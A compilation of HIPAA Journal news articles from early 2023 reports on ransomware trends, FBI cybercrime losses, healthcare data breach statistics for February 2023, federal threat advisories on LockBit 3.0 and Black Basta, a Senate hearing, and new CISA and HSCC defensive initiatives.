Healthcare Cybersecurity

Ransomware Attacks Increased by More Than 51% in February

Ransomware activity increased in February according to the latest GRIT Ransomware Report from GuidePoint Security. The report is based on data collected by the GuidePoint Research and Intelligence Team, which reports a 51.5% increase in attacks compared to January and a 15.8% increase in attacks compared to February 2022.

The LockBit 3.0 ransomware group was particularly active in February, posting more than twice the number of victims (129) on its leak site as January (50), accounting for virtually all of the monthly increase in attacks. ALPHV/BlackCat also listed more victims (30) on its data leak site than January (21), with Royal and BinLian in the third and fourth spots. Medusa completed the top 5. There was a 21% decrease in Royal ransomware victims compared to January, but a massive 400% increase in BianLian victims. According to the cybersecurity firm Redacted, the BianLian group appears to have changed tactics and is now increasingly monetizing its breaches without using file encryption and is concentrating on extortion after stealing data.

While the healthcare industry is often targeted by ransomware gangs, there was a shift in the industries targeted by ransomware groups in February, with a marked increase in attacks on the food and beverage, banking/financial services, and engineering industries. The GRIT team reports that healthcare was the 7th most targeted sector out of 10 sectors tracked. While the most active ransomware groups do not appear to be primarily targeting the healthcare industry, there are many smaller ransomware groups that are steadily conducting attacks and GuidePoint Security has warned that these smaller groups, which often break away from larger ransomware groups, are more likely than the larger groups to actively target the healthcare sector.

The researchers also drew attention to the Royal ransomware group, which is a relatively new addition to the threat landscape having only been in operation since September 2022. The group has conducted at least 97 attacks since then but there is concern that activity will increase. Royal is believed to include members from other ransomware operations such as Conti and the group is thought to have considerable experience in conducting ransomware attacks. Recently, the Health Sector Cybersecurity Coordination Center issued a warning about Royal ransomware and said the group poses a threat to the healthcare and public health sector. Royal was behind the recent ransomware attack on the medical device manufacturer Revenetics, although the majority of the group’s victims so far have been in the technology sector

As was the case in January, the majority of attacks were on targets in the United States, which experienced 62 attacks in January and 117 attacks in February, although attacks were more geographically spread last month and occurred in 48 countries compared to 38 in January.

The post Ransomware Attacks Increased by More Than 51% in February appeared first on HIPAA Journal.

20% of Ransomware Attacks Involve Victim Harassment

Ransomware gangs are increasingly skipping file encryption and are concentrating on data theft and extortion, according to a recent report from Palo Alto Networks’ Unit 42 team. In the second half of 2021 and throughout 2022, around 1 in 10 attacks by ransomware gangs did not involve file encryption, only data theft and extortion.

Around one-third of incidents responded to by the Unit 42 team are ransomware incidents, 70% of which involve data theft, up from 40% of attacks in mid-2021. Data from Coveware indicates more victims of ransomware attacks are now refusing to pay ransom demands, and that has forced ransomware gangs to adopt more aggressive tactics. The Unit 42 team says, on average, ransomware gangs upload the data of 7 victims a day to their data leak sites, and it is becoming increasingly common for ransomware gangs to harass victims. 20% of the incidents Unit 42 responds to have some degree of victim harassment, compared to around 1% of attacks in mid-2021.

Michael Sikorski, CTO and VP of threat intelligence at Unit 42, said an attack on a hospital that refused to pay the ransom saw the threat actor contact patients and threaten to publish their medical records to pile pressure on the hospital to pay the ransom demand. In another case, the wife of the CEO of a company was sent threatening SMS messages when the ransom was not paid. When patients or customers of companies are contacted and harassed by a threat actor, the reputational damage caused can result in a considerable loss of business. Sikorski said victims of ransomware attacks are increasingly recovering files from backups and refusing to pay ransoms, but the harassment tactics could well see that trend reversed.

Organizations need to develop and practice an incident response plan to ensure the quickest possible recovery from a ransomware attack but Palo Alto Networks suggests it is also now vital to prepare a playbook for multi-extortion and to develop crisis communication protocols. “Having a comprehensive incident response plan with corresponding crisis communication protocols will greatly reduce uncertainty. It’s important to know which stakeholders should be involved, and the process to make decisions promptly (e.g., whether or not to pay, or who is authorized to approve payments).” It is important to know what to do – and not to do – when ransomware gangs start contacting and harassing employees or patients. Employees should be provided with ransomware harassment training and the tools and processes they need to follow during an active harassment incident. Having a playbook for multi-extortion will help to limit the harm that can be caused.

The post 20% of Ransomware Attacks Involve Victim Harassment appeared first on HIPAA Journal.

FBI: Losses to Cybercrime Increased by 49% in 2022 to $10.3 Billion

The Federal Bureau of Investigation (FBI) has published its 2022 Internet Crime Report, which shows at least $10.3 billion was lost to cybercrime in 2022, up 49% ($3.4 billion) from 2021, despite a 5% reduction in complaints (800,944). Over the past 5 years, the FBI Internet Crime Complaint Center (IC3) has received reports of losses of more than $27.6 billion across 3.26 million complaints to IC3.

FBI data show a 36% year-over-year decrease in ransomware attacks, which fell from 3,729 complaints in 2021 to 2,385 complaints in 2022. Despite this decrease, the FBI says ransomware still poses a significant threat, especially to the healthcare sector which ranked top out of 16 critical infrastructure sectors for ransomware attacks in 2022 and actually saw an increase in complaints. 210 ransomware complaints were filed with IC3 in 2022 by healthcare organizations compared to 148 in 2021. The FBI has observed an increase in double extortion tactics in ransomware attacks, where data are stolen in addition to file encryption and payment is required to obtain the decryption keys and to prevent the publication or sale of stolen data. LockBit was the most prolific ransomware actor with 149 reported attacks, ALPHV/BlackCat was second with 114 attacks, and Hive was 3rd with 87 attacks.

Several cybercriminal groups that have historically used ransomware in their attacks have switched to extortion-only attacks, involving data theft and ransom demands but no file encryption. The FBI’s data shows extortion attacks have remained flat, increasing only slightly from 39,360 complaints in 2021 to 39,416 complaints in 2022.

Phishing remains one of the most common attack vectors, although reported phishing attacks fell by 7% year over year to 300,497 incidents. Even with that decrease, phishing is still the most common crime type in terms of victim count ahead of personal data breaches with 58,859 complaints and non-payment/non-delivery with 51,679 complaints.

Business email compromise (BEC) ranked 9th out of all crime types in terms of complaints but ranked 2nd in terms of reported losses with $2,742,354,049 lost to BEC attacks in 2022. BEC attacks increased 9% year-over-year although losses to the scams were down almost 14.5%. BEC was knocked from the top spot this year by investment scams, which saw $3,311,742,206 in reported losses, up 127% from 2021. The FBI reports an unprecedented increase in crypto investment schemes in 2022 in terms of both victim count and losses.

There was a major increase in tech support scams in 2022, which rose to 3rd place in terms of losses. Tech support scam complaints increased by 36% year-over-year to 32,538 complaints and losses to these scams increased by almost 132% to $806,551,993.

The FBI stressed the importance of reporting instances of cybercrime of any type and confirmed assistance will be provided to try to recover losses. The IC3 Recovery Asset Team (RAT) has a 73% success rate in freezing funds and limiting losses and has frozen $433.30 million in funds out of $590.62 million in reported losses across 2,838 incidents.

The post FBI: Losses to Cybercrime Increased by 49% in 2022 to $10.3 Billion appeared first on HIPAA Journal.

February 2023 Healthcare Data Breach Report

The number of healthcare data breaches reported over the past three months has remained fairly flat, with only a small uptick in breaches in February, which saw 43 data breaches of 500 or more records reported to the HHS’ Office for Civil Rights (OCR), well below the 12-month average of 57.4 reported breaches a month. An average of 41 data breaches have been reported each month over the past 3 months, compared to an average of 50.6 breaches per month for the corresponding period last year.

February 2023 Healthcare Data Breach Report - Records breached

The downward trend in breached records did not last long. There was a sizeable month-over-month increase in breached records, jumping by 418.7% to 5,520,291 records. February was well above the monthly average of 4,472,186 breached records a month, with the high total largely due to a single breach that affected more than 3.3 million individuals.

February 2023 Healthcare Data Breach Report - Records Breached

 

Largest Healthcare Data Breaches Reported in February 2023

17 healthcare data breaches of 10,000 or more records were reported in February, all of which were hacking incidents. The largest data breach affected 3,300,638 patients of 4 medical groups in California that are part of the Heritage Provider Network – Regal Medical Group, Inc.; Lakeside Medical Organization, A Medical Group, Inc.; ADOC Acquisition Co., A Medical Group Inc.; & Greater Covina Medical Group, Inc. This was a ransomware attack with confirmed data theft and was, at the time of reporting, the largest data healthcare data breach of the year. That record did not stand for long, as a 4.4 million-record breach was reported this month (Independent Living Systems).

Hacking incidents were reported by CentraState Healthcare System in New York (617,901 records), Cardiovascular Associates in Alabama (441,640 records), and the Florida-based revenue cycle management company, Revenetics (250,918 records), all of which saw sensitive data exfiltrated. It is unclear whether these incidents were ransomware or extortion attacks. An email account breach at Highmark Inc. rounds out the top five. That incident was reported to the HHS’ Office for Civil Rights as two separate breaches, affecting 239,039 and 36,600 individuals -275,639 in total. The breach occurred as a result of an employee clicking a link in a phishing email.

The full list of 10,000+ record data breaches and their causes are detailed in the table below.

Name of Covered Entity State Covered Entity Type Individuals Affected Business Associate Present
Regal Medical Group, Inc., Lakeside Medical Organization, A Medical Group, Inc., ADOC Acquisition Co., A Medical Group Inc. & Greater Covina Medical Group, Inc. CA Healthcare Provider 3,300,638 Ransomware attack (data theft confirmed)
CentraState Healthcare System, Inc. NJ Healthcare Provider 617,901 Hacking incident (data theft confirmed)
Cardiovascular Associates AL Healthcare Provider 441,640 Hacking incident (data theft confirmed)
Reventics, LLC FL Business Associate 250,918 Hacking incident (data theft confirmed)
Highmark Inc PA Health Plan 239,039 Phishing attack
90 Degree Benefits, Inc. WI Business Associate 175,000 Hacking incident
Hutchinson Clinic, P.A. KS Healthcare Provider 100,000 Hacking incident
Lawrence General Hospital MA Healthcare Provider 76,571 Hacking incident
Sharp Healthcare CA Healthcare Provider 62,777 Hacked web server (data theft confirmed)
Rise Interactive Media & Analytics, LLC IL Business Associate 54,509 Hacking incident
Highmark Inc PA Business Associate 36,600 Phishing attack
Teijin Automotive Technologies Welfare Plan MI Health Plan 25,464 Ransomware attack – Access gained through phishing
Evergreen Treatment Services WA Healthcare Provider 21,325 Hacking incident
Aloha Nursing Rehab Centre HI Healthcare Provider 20,216 Hacking incident (data theft confirmed)
NR Pennsylvania Associates, LLC PA Healthcare Provider 14,335 Hacking incident (data theft confirmed)
Intelligent Business Solutions NC Business Associate 11,595 Ransomware attack
Arizona Health Advantage, Inc. dba Arizona Priority Care; AZPC Clinics, LLC; and health plans for which APC has executed a BAA AZ Healthcare Provider 10,978 Ransomware attack

Causes of Healthcare Data Breaches in February 2023

Hacking and other IT incidents dominated the breach reports in February with 33 such incidents reported, accounting for 76.7% of all breaches reported in February. Across those incidents, the records of 5,497,797 individuals were exposed or stolen – 99.59% of the breached records in February. The average breach size was 166,600 records and the median breach size was 10,978 records.

There were 8 unauthorized access/disclosure incidents reported involving a total of 13,950 records. The average breach size was 1,744 records and the median breach size was 689 records. One of the incidents – reported by Asante – involved a physician accessing the records of patients when there was no treatment relationship. The unauthorized access occurred for 9 years before it was detected, during which time the records of 8,834 patients were impermissibly viewed. Incidents such as this show why it is important to maintain logs of medical record access and to review those logs regularly, ideally automating the process using a monitoring and alerting system.

February 2023 Healthcare Data Breach Report - Causes

One theft incident was reported involving a portable electronic device containing the PHI of 986 patients and one incident involved the improper disposal of paper records that contained the PHI of 7,558 patients.

February 2023 Healthcare Data Breach Report - Location PHI

What HIPAA-Regulated Entities were Affected?

Healthcare providers were the worst affected HIPAA-regulated entity in February, with 31 data breaches of 500 or more records. Seven data breaches were reported by business associates and five were reported by health plans. When data breaches involve business associates, they are often reported by the covered entity. In February, 6 data breaches involved business associates but were reported by the affected healthcare providers and health plans. The two charts are based on where the breach occurred rather than who reported it.

February 2023 Healthcare Data Breach Report - Reporting Entities

The average healthcare provider breach exposed 178,046 records (median: 3,061 records), the average health plan data breach exposed 67,236 records (median: 3,909 records), and the average business associate data breach involved 47,859 records (median: 8,500 records).

February 2023 Healthcare Data Breach Report - records by reporting entity

Where Did the Breaches Occur?

Data breaches were reported by HIPAA-covered entities and business associates in 28 states, with California being the worst affected state with 4 breaches reported in February.

State Breaches
California 4
Pennsylvania & Texas 3
Arizona, Illinois, Kansas, Massachusetts, New Jersey, Oregon, Virginia & Washington 2
Alabama, Colorado, Connecticut, Florida, Georgia, Hawaii, Iowa, Maryland, Michigan, New Hampshire, New Mexico, North Carolina, Rhode Island, Tennessee, Utah, Wisconsin & Wyoming 1

HIPAA Enforcement Activity in February 2023

The HHS’ Office for Civil Rights announced one enforcement action in February to resolve alleged violations of the HIPAA Rules. OCR investigated Banner Health over a 2016 breach of the protected health information of 2.81 million individuals and identified multiple potential HIPAA violations related to risk analyses, system activity reviews, verification of identity for access to PHI, and technical safeguards. Banner Health agreed to settle the case and paid a $1,125,000 financial penalty.

DNA Diagnostics Center was investigated by the Attorneys General in Pennsylvania and Ohio after a reported breach of the personal and health information of 45,600 state residents. The investigation determined there was a lack of safeguards, a failure to update its asset inventory, and a failure to disable or remove assets that were not used for business purposes. While these failures would have been HIPAA violations, the settlement resolved violations of state laws. DNA Diagnostics Center paid a financial penalty of $400,000, which was split equally between the two states.

In February, the Federal Trade Commission (FTC) announced its first-ever settlement to resolve a violation of the FTC Health Breach Notification Rule. While the Rule has been in effect for a decade, the FTC has never enforced it. That has now changed. The FTC stated last year that it would be holding non-HIPAA-covered entities accountable for impermissible disclosures of health information and breach notification failures. GoodRx Holdings Inc. was found to have used tracking technologies on its website that resulted in unauthorized disclosures of personal and health information to Facebook, Google, and other third parties and failed to issue notifications to affected individuals. The allegations were settled and GoodRx paid a $1,500,000 financial penalty.

The post February 2023 Healthcare Data Breach Report appeared first on HIPAA Journal.

Feds Release Updated Threat Intelligence on LockBit 3.0 Ransomware

A joint cybersecurity advisory has been issued by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC) about LockBit 3.0 ransomware, also known as LockBit Black.

The LockBit ransomware group has been in operation since at least September 2019 and is one of the most prolific ransomware groups. The group conducted more attacks than any other ransomware operation in 2022 and it has been estimated that LockBit ransomware is involved in around 40% of all ransomware attacks worldwide.  The group is believed to have conducted more than 1,000 attacks on organizations in the United States and has generated more than $100 million in ransom payments.

LockBit is a ransomware-as-a-service operation that recruits affiliates to conduct attacks in return for a cut of the ransoms they generate. The group engages in double extortion tactics, where files are stolen prior to encryption and threats are issued to publish or sell the stolen data if the ransom is not paid. Victims are usually small- to medium-sized organizations, although attacks on large organizations are not unknown. The ransom demands average at around $85,000 per victim.

The ransomware is actively developed and evolved into LockBit 2.0 in 2021, and LockBit 3.0 in June 2022. LockBoit 3.0 has features similar capabilities to BlackMatter ransomware, and it is possible some of the same code has been used. Initial access to victim networks is gained through a variety of methods, including purchasing access from initial access brokers, insider access, exploiting unpatched and zero-day vulnerabilities, phishing, and Remote Desktop Protocol (RDP) exploitation. Affiliates use a custom data exfiltration tool called Stealbit; the open-source command line cloud storage manage, rclone; and publicly available file sharing services such as MEGA to exfiltrate stolen data.

The group was behind attacks on the NHS vendor, Advanced, which affected 16 customers in the health and social care sector; the German auto parts company, Continental; the IT firm Accenture; the UK’s Royal Mail, and many more. In December 2022, a LockBit affiliate attacked The Hospital for Sick Children (SickKids) in Toronto. The group issued an apology for the attack and provided a free decryptor, and claimed the affiliate was kicked out for violating its terms and conditions which prohibit attacks on “medical institutions” where attacks could result in death, including cardiology centers, neurosurgical departments, and maternity hospitals. The group does, however, permit attacks on pharma firms, dentists, and plastic surgeons. These policies are not always enforced, as LockBit affiliates have conducted attacks on hospitals in the past where free decryptors were not provided, such as the attack on the Center Hospitalier Sud Francilien (CHSF) in France.

The U.S. Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center issued a threat brief about LockBit 3.0 in December 2022 in response to known attacks on the Healthcare and Public Healthcare (HPH) sector, and despite the group’s claims, HC3 believes LockBit 3.0 poses a threat to the HPH sector. The Joint Cybersecurity alert from the FBI, CISA, and MS-ISAC provides details of the latest tactics, techniques, and procedures (TTPs) associated with the group, Indicators of Compromise (IoCs) technical information for network defenders, and recommended mitigations for improving cybersecurity posture.

The post Feds Release Updated Threat Intelligence on LockBit 3.0 Ransomware appeared first on HIPAA Journal.

Senate Committee Told How Federal Government Can Improve Healthcare Cybersecurity

On Thursday last week, the U.S. Senate Committee on Homeland Security and Governmental Affairs held a hearing to examine cybersecurity risks to the healthcare sector, how healthcare providers and the federal government are working to combat those threats, and determine what the federal government needs to do to improve defenses against cyberattacks on the healthcare sector.

“Relentless cyber-attacks show that foreign adversaries and cybercriminals will stop at nothing to exploit cybersecurity vulnerabilities our critical infrastructure and most essential systems,” said Committee Chairman, Gary C. Peters (D-MI). “What is most concerning about these attacks is that they don’t just compromise personal information, they can actually affect patient health and safety.”

Peters explained that the committee has already taken important steps to strengthen cybersecurity for critical infrastructure sectors, including the healthcare sector, including advancing a bipartisan bill requiring critical infrastructure organizations to report cyber-attacks and ransomware payments to the Cybersecurity and Infrastructure Security Agency (CISA) to provide more transparency and situational awareness for cybersecurity defenses and enable CISA to warn potential victims of ongoing attacks; but accepted that Congress can do much more to ensure critical networks in the healthcare and public health sector remain resilient against cyber-attacks.

At the hearing, testimonies were provided by Scott Dresden, SVP and CISO, Corewell Health; Kate Pierce, Senior Virtual Information Security Officer, Fortified Health Security; Greg Garcia, Executive Director, Cyber Security Healthcare and Public Health Sector Coordinating Council; and Stirling Martin, SVP & Chief Privacy and Security Officer, Epic Systems.

Scott Dresden, SVP and CISO, Corewell Health

Scott Dresden explained that the healthcare sector is particularly vulnerable to cyberattacks due to the complex healthcare business model, which often involves multiple, often independent, entities coming together to form what the patient sees as a cohesive care delivery process. “Over time and often out of necessity, this model has evolved in ways that have made us more vulnerable to cyber-attacks,” said Dresden. “For example, the rapid expansion of network-connected technologies to provide telehealth during the COVID-19 pandemic” and the “expanded use of Software as a Service and other cloud-based solutions.” These have increased the attack surface considerably and provided many opportunities for threat actors to compromise an organization.

Dresden explained that it is vital to implement a comprehensive information security program but there is great disparity across the industry. While large health systems have the resources to create an effective security team, that is far more difficult for small and medium-sized healthcare organizations, and even large health systems with mature security programs are still being compromised. Dresden has called for the U.S. government to respond to cyber threats more effectively and automate the sharing of the actionable threat intelligence the government acquires with the healthcare sector. Doing so would enable rapid, near real-time automatic ingestion of threat intelligence into the technologies participating members use to protect their respective organizations.

The HHS’ Office for Civil Rights has recently called for Congress to increase the penalty caps for HIPAA violations to help address its budget shortfall, but Dresden does not believe this is a wise move. “We understand and support the legislative intent to encourage adoption of best practices and the implementation of appropriate protections to safeguard our data, “ said Dresden. “However, penalizing victims of cyberattacks, when defensive measures can’t keep up with the sophistication of hackers, is not the fair approach.”

Kate Pierce, Senior Virtual Information Security Officer, Fortified Health Security

Kate Pierce, who prior to joining Fortified Health Security served as CIO and CISO at a 25-bed community hospital in Vermont for 21 years drew attention to the cybersecurity gaps at small rural hospitals, which face severe financial and staffing constraints and struggle to recruit cybersecurity talent. While recommended cybersecurity best practices in voluntary guidance can be adopted by large healthcare organizations,  at small, under-resourced hospitals they simply won’t be implemented. She recommends introducing mandatory minimum security standards, as without that requirement, cybersecurity will not be prioritized over other pressing needs. She also explained mandatory security standards are important, but small healthcare providers will also need to be provided with the ability to implement the required security measures. Pierce also drew attention to the difficulty rural hospitals face obtaining cyber insurance coverage, and that even if coverage can be obtained, the rates are between 35% and 75% higher than for larger healthcare organizations and there are typically far more exclusions. Small healthcare organizations rely on cyber insurance to ensure they can recover from cyberattacks.

Stirling Martin, SVP & Chief Privacy and Security Officer, Epic Systems

Stirling Martin drew attention to the current staffing shortages and the difficulty healthcare organizations have attracting and retaining high-demand security talent. He explained that Epic has seen huge variation in the sophistication of security programs at healthcare providers across the country and says there is no defined benchmark of what security practices are considered sufficient. He also said there is a lack of cybersecurity information sharing among healthcare organizations and limited threat intelligence from government agencies and private industry. Martin has called for the government to step in and help address the current talent shortage and suggests the federal government could develop security training programs and incentivize newly trained professionals to work in healthcare. He also suggests federal agencies such as CISA or NIST could develop a single set of prescriptive security practices for the healthcare industry, or for there to be industry efforts such as HITRUST or collaboration such as the Healthcare Sector Coordinating Council.

Greg Garcia, Executive Director, Cyber Security Healthcare and Public Health Sector Coordinating Council

Greg Garcia provided an overview of cyber threat, vulnerability, and data breach trends, an outline of how the industry and government agencies have been working together to address cybersecurity, and made several recommendations on how the government can support the health industry’s efforts to improve security.

The recommendations include augmenting the HHS 405(d) program, which already has a successful track record of partnership with the healthcare industry; creating a Healthcare Cybersecurity Workforce Development Program to address the staffing challenges; providing financial support to help healthcare organizations improve cybersecurity; and to increase funding for HHS Health Sector Cyber Coordination Center (HC3) to expand its ability to be a knowledge sharing and analysis resource for the sector.

With budgets already stretched, dealing with the multiple class action lawsuits that are filed following a data breach can be a huge financial drain on healthcare organizations and the money spend defending lawsuits would be better spent on improving cybersecurity to prevent further data breaches. Garcia suggests health delivery organizations should be protected from class action lawsuits if they demonstrate they have implemented recognized security practices such as the NIST CSF or HICP.

Garcia also recommended updating HIPAA to reference the use of minimum standards in NIST CSF, HICP, or other recognized security practices, rather than prescribing cybersecurity requirements in statute. “These standards should be built in partnership with the HSCC and regulators such as (OCR, ONC, CMS, and FDA) and cross-mapped for overlap or conflict across the various regulatory regimes intersect,” said Garcia. “A holistic, coherent cyber policy strategy is essential for a healthcare environment where clinical operations, medical devices, electronic health record technology, patient data, and IT systems are all interconnected but subject to different regulatory structures and authorities.”

The post Senate Committee Told How Federal Government Can Improve Healthcare Cybersecurity appeared first on HIPAA Journal.

HC3 Shares Black Basta Ransomware Threat Intelligence Data

The Health Sector Cybersecurity Coordination Center (HC3) has shared threat intelligence information about the Black Basta ransomware group to help network defenders prevent and rapidly detect attacks in progress. The Black Basta group was first identified in April 2022 and is known to conduct ransomware and extortion attacks. The group engages in double extortion tactics, exfiltrating sensitive data and encrypting files, then issues threats to publish the data on its data leak site if the ransom is not paid. The group is also known to conduct extortion-only attacks without file encryption.

While the group has only been in operation for a relatively short time, it is clear that the group has extensive experience in ransomware attacks, as in the first two weeks of operation the group is known to have conducted at least 20 ransomware attacks. The Russian-speaking threat group is believed to include former members of the Conti and BlackMatter ransomware operations and uses similar tactics, techniques, and procedures to those groups and is thought to have links to the FIN7 threat group. It is highly probable that the group has conducted ransomware attacks in the past under a different name, with some security researchers believing Black Basta is a rebrand of Conti. Conti was officially disbanded in May 2022 and it is thought that the group split into several smaller operations.

Black Basta consists of highly capable individuals well-versed in conducting ransomware attacks. The group has conducted attacks on several healthcare and public sector (HPH) healthcare organizations, including health information technology companies, healthcare industry service providers, laboratories and pharmaceutical firms, and health plans. The vast majority of its victims are located in the United States, although the group has started conducting attacks in other countries, primarily the Five Eyes countries (USA, Australia, Canada, New Zealand, and the United Kingdom).

Black Basta is known for carefully choosing its targets and has attacked many critical infrastructure entities. The attacks are believed to be financially motivated, rather than linked to the Russian government, although it is possible that the group also has some sort of political agenda based on the countries that are typically targeted. The group does not rely on one method of attack and often uses a unique approach in attacks on specific targets. The group is known to purchase access to systems from initial access brokers. Once access is gained, the group uses a variety of tools for remote access, privilege escalation, lateral movement, and data exfiltration, including Qakbot/QBot, SystemBC, Mimikatz, ColbaltStrike, and Rclone. Additional methods of access include the exploitation of vulnerabilities, Remote Desktop Protocol, phishing, web injections, malicious downloads, and repackaged/infected software installers.

You can view the full analysis of the group along with the recommended defensive measures and mitigations here.

The post HC3 Shares Black Basta Ransomware Threat Intelligence Data appeared first on HIPAA Journal.

HSCC Issues Guidance for Healthcare Organizations on Managing Legacy Technology Security

This month, the Healthcare and Public Health Sector Coordinating Council (HSCC) Cybersecurity Working Group (CWG) published guidance to help healthcare delivery organizations effectively manage cyber risks associated with legacy technology. In healthcare, a great deal of attention has been focused on addressing cybersecurity risks associated with legacy medical devices, but they are not the only type of legacy technology in use in healthcare environments. Many different technologies are used that similarly become more vulnerable as they age, and continue to be used after end-of-life has been reached and support is withdrawn. Technologies include FDA-regulated devices, non-FDA-regulated devices, laboratory equipment, building and facilities technology, and a host of other technologies.

While the obvious solution from a security perspective is to upgrade to modern, supported systems ahead of the technologies reaching end-of-life, that is often not practical or possible. Instead, healthcare delivery organizations need to effectively manage the risks associated with these technologies. Vulnerabilities in these technologies can be exploited by malicious actors, which can threaten patient privacy and patient safety. Unfortunately, many healthcare organizations that use legacy technologies have limited staff and resources to devote to protecting these technologies, which means vulnerabilities can persist indefinitely.

The guidance – Health Industry Cybersecurity – Managing Legacy Technology Security (HIC-MaLTS) – details best practices and makes several recommendations for healthcare delivery organizations, medical device manufacturers, and other technology providers whose products are used in healthcare environments. The guidance explains that all of these entities have a shared responsibility to ensure legacy technologies can be used securely in clinical environments while staying one step ahead of modern cyber threats. HSCC encourages healthcare delivery organizations, medical device manufacturers, and other technology providers to work together to effectively manage risk.

The guidance is the result of three years of work by 67 industry and government member organizations, including healthcare delivery organizations, medical device manufacturers, trade groups, government representatives, security experts, and health IT companies. The guidance covers the four core pillars of a comprehensive legacy technology cyber risk management program: governance, communications, cyber risk management, and future-proofing legacy technologies, and includes general and specific recommendations for each of those pillars in an easily actionable format.

The post HSCC Issues Guidance for Healthcare Organizations on Managing Legacy Technology Security appeared first on HIPAA Journal.

CISA Launches Ransomware Vulnerability Warning Pilot Program

The U.S. Cybersecurity and Infrastructure Agency (CISA) has launched a new pilot program in response to the increase in ransomware attacks on critical infrastructure entities. The aim of the pilot program is to help critical infrastructure entities better protect their systems against ransomware attacks by fixing exploitable vulnerabilities in their Internet-facing systems.

The Ransomware Vulnerability Warning Pilot (RVWP) program is authorized under the Cyber Incident Reporting for Critical Infrastructure Act (CIRCIA) of 2022 and commenced on January 30, 2023. Under the program, CISA conducts scans to determine if Internet-exposed systems contain vulnerabilities that could potentially be exploited by ransomware actors to gain access to their networks. Alerts are then sent to those entities by CISA’s regional cybersecurity personnel to inform them that vulnerabilities exist, which will allow timely action to be taken to fix the flaws before they can be exploited by ransomware gangs or other malicious actors. CISA says critical infrastructure entities may be unaware that they have exploitable vulnerabilities in their systems and may only discover unpatched vulnerabilities once they have been exploited in a ransomware attack. CISA said the RVWP program leverages existing services, data sources, technologies, and authorities including CISA’s Cyber Hygiene Vulnerability Scanning Service and the Administrative Subpoena Authority granted to CISA under Section 2009 of the Homeland Security Act of 2022.

The program is focused on identifying vulnerabilities in Internet-facing systems that are known to have been exploited by ransomware gangs in previous attacks. Under the RVWP program, CISA has already notified almost 100 critical infrastructure entities that they have systems with unaddressed ProxyNotShell vulnerabilities in Microsoft Exchange. ProxyNotShell vulnerabilities have been widely exploited by ransomware gangs over the past few months.

“Ransomware attacks continue to cause untenable levels of harm to organizations across the country, including target rich, resource-poor entities like many school districts and hospitals,” said Eric Goldstein, Executive Assistant Director for Cybersecurity, CISA. “The RVWP will allow CISA to provide timely and actionable information that will directly reduce the prevalence of damaging ransomware incidents affecting American organizations. We encourage every organization to urgently mitigate vulnerabilities identified by this program and adopt strong security measures consistent with the U.S. government’s guidance on StopRansomware.gov.” CISA also encourages critical infrastructure entities to report ransomware attacks to the U.S. government via the FBI’s Internet Crime Complaint Center or CISA’s incident reporting system.

The RVWP program is one of several initiatives launched by CISA in the past two years in response to ransomware attacks on critical infrastructure entities and government agencies, including the attacks on Colonial Pipeline, JBS Foods, and Kaseya. These efforts include the addition of a Ransomware Readiness Assessment (RRA) module to its Cyber Security Evaluation Tool (CSET), the formation of a public-private partnership – the Joint Cyber Defense Collaborative (JCDC) to proactively gather, analyze, and share actionable cyber risk information– and the launch of its Stop Ransomware website, which serves as a one-stop-shop for alerts and ransomware resources.

The post CISA Launches Ransomware Vulnerability Warning Pilot Program appeared first on HIPAA Journal.